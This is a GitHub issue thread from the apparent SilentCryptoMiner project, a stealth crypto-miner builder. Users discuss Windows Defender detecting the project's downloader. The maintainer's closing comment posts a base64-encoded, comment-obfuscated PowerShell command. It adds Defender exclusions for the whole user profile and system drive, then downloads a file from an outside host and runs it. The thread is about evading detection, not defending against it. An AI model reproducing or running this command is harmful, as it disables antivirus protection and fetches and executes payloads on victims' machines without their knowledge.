### ISSUE TITLE
WD Exclusions

### ISSUE THREAD

**Issue by Nobellium1** [UnamSanctam/SilentCryptoMiner#765]
![image](https://user-images.githubusercontent.com/96837088/169668172-6ab06d3f-e121-494a-8a76-e9feb3960f4f.png)
So basically this appeared out of nowhere, I was right, it's the new downloader and not the old one. 
Keep in mind I REMOVED build and then after few hours this happened out of nowhere, it just started spamming like crazy about this.

**Comment by Nobellium1** [comment]
I added a normal file that's not even a virus into downloader but turned on exclusions to see if you were right about it, but it seems it detected exclusions by itself

**Comment by Nobellium1** [comment]
And removed em all, ofc

**Comment by Nobellium1** [comment]
Btw in that text it says .exe and .dll but those were not even in exclusion list, the ONLY exclusions were C: and Userprofile

**Comment by UnamSanctam** [comment]
You can check the code, that exclusion command comes from the old downloader so you're getting that detection from something else. I just downloaded the downloader from the release page, built it and ran it and it executed this command like it should:
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZwByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAPAAjAGoAagBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBmAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABkAGEAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGkAbQBhAGcAZQBzAC4AcABlAHgAZQBsAHMALgBjAG8AbQAvAHAAaABvAHQAbwBzAC8ANAA1ADIAMAAxAC8AawBpAHQAdAB5AC0AYwBhAHQALQBrAGkAdAB0AGUAbgAtAHAAZQB0AC0ANAA1ADIAMAAxAC4AagBwAGUAZwAnACwAIAA8ACMAegB5AGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB3AGUAegAjAD4AIAAtAFAAYQB0AGgAIAAoACQAcAB3AGQAKQAuAHAAYQB0AGgAIAA8ACMAZwB6AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBhAHQALgBqAHAAZQBnACcAKQApADwAIwB0AGUAagAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAHcAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAKAAkAHAAdwBkACkALgBwAGEAdABoACAAPAAjAHYAZQBoACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAYQB0AC4AagBwAGUAZwAnACkAPAAjAHoAcgBmACMAPgA="
```
